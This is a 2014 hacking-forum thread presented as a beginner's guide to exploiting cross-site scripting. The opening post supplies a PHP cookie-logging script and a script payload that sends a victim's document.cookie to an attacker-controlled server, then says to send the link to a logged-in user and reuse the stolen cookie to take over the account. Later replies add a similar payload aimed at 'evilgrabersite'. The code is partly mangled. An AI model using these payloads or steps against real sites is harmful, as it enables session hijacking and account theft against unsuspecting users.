Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


How to exploit an XSS after you've found for beginners

  • 0 Vote(s) - 0 Average


10-03-2014, 02:29 AM #1
SickSpawn Offline You have an error in your SQL syntax; ***
TeaM MaDLeeTs
Posts:85 Threads:28 Joined:Sep 2014 Reputation: 2
Mood: Hacker
Many of you know how to find an XSS but fail to exploit

U XSS is a vulnerability that allows the extraction of user cookies visiting the link that contains XSS . If the user is logged in, the cookie holds information session logging, this means that if you steal and replace with ours, we can access the victim's account without her know credintialele .

Suppose we found a XSS vulnerability on a particular site. First we need a website or a server to which the cookie will be sent. Suppose you http://www.sitegrab.com . Place on a file server that contains the following code called grab.php php:

Code:
< ? php
$ cookie = $ HTTP_GET_VARS [" cgrab " ] ;
$ fh = fopen (' cookies.txt ', ' a') ;
fwrite ($ fh , $ cookie . "\ n \ n" ) ;
? >

Sometimes some servers do not allow the creation cookies.txt file if it does not exist , so it 's good to create you create a file called " cookies.txt " and make sure that they have rights to read and write .

As you saw , xss sites that are posted in general are like <script> alert (' 1 ') < / script> . That just shows that the site is vulnerable to XSS . The script that you need to use it is this:

Code:
<script> document.location = " http://www.sitevulnerabil.com/grab.php?cgrab =" + document.cookie </ script>

Send the link to a particular user 's xss ( which I think is logged ) and the cookie will be saved in http://www.sitevulnerabil.com/cookies.txt
you just have to take them and add them to cookies folder from Internet Explorer or replace them with current ones. This will be logged in the session victim and you have full rights on the account.
Source

[#] Twitter: sickspawnhy
[#] Jabber : [email protected]

10-03-2014, 08:20 PM #2
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:812 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
great share but i think a bit to easy to identifier Smiley1 you can use some image inclusion. like in one of my tutorials here Smiley1

[Image: xodhvlpa.jpg]
[Image: test.php]

10-16-2014, 02:58 PM #3
Ninja Offline Junior Member **
Registered
Posts:29 Threads:2 Joined:Oct 2014 Reputation: 4
Mood: Speechless
If my memory serves good then what you say will not work.

correct me if i am wrong.

You said use "http://www.sitevulnerabil.com/grab.php?..grab code"

But suppose XSS is in "http://www.sitevulnerabil.com/page/browse.php" then we cant get cookie.

So to grab cookie we have to form the url like this ?? :-
"http://www.sitevulnerabil.com/page/grab.php?..grab code"
confused

its not always necessary that the index page will be xss vulnerable.

suppose http://www.sitevulnerabil.com/page/browse.php?id=12 is vulnerable then how to cookie grab?

# Knowledge Must Be free
# Anyone needs any C++/ASM programming help then contact me.
# Need help compiling your local roots,i will do that too.
http://www.madleets.com

10-16-2014, 06:39 PM #4
SickSpawn Offline You have an error in your SQL syntax; ***
TeaM MaDLeeTs
Posts:85 Threads:28 Joined:Sep 2014 Reputation: 2
Mood: Hacker
Ninja XSS is may be vulnerable in /grab.php; browse.php; search.php etc Biggrinsmiley
(is just an example Biggrinsmiley )
I do not understand ... what do you mean exactly?

[#] Twitter: sickspawnhy
[#] Jabber : [email protected]

10-17-2014, 01:14 AM #5
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:812 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
Jep i am totally confused too Smiley1
i found the explanation from sickspawn totally understandable

[Image: xodhvlpa.jpg]
[Image: test.php]

10-17-2014, 01:50 AM #6
Ninja Offline Junior Member **
Registered
Posts:29 Threads:2 Joined:Oct 2014 Reputation: 4
Mood: Speechless
Haaa ok ok .Heee

Suppose this link got XSS:- http://www.google.com/form/submit.php?id=1 (XSS flaw after php?id=1)


So to grab cookie of google.com i must use :-
<script> document.location = " http://www.google.com/grab.php?cgrab =" + document.cookie </ script>

OR

<script> document.location = " http://www.google.com/form/submit.php?grab.php?cgrab =" + document.cookie </ script>

?? Biggrinsmiley

# Knowledge Must Be free
# Anyone needs any C++/ASM programming help then contact me.
# Need help compiling your local roots,i will do that too.
http://www.madleets.com

10-17-2014, 01:52 AM #7
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:812 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
nope you nee a default xss injection code like that :
Code:
<script>document.location="http://evilgrabersite/grab.php?content=" + document.cookie;</script>

[Image: xodhvlpa.jpg]
[Image: test.php]






Forum Jump:


Users browsing this thread:1 Guest(s)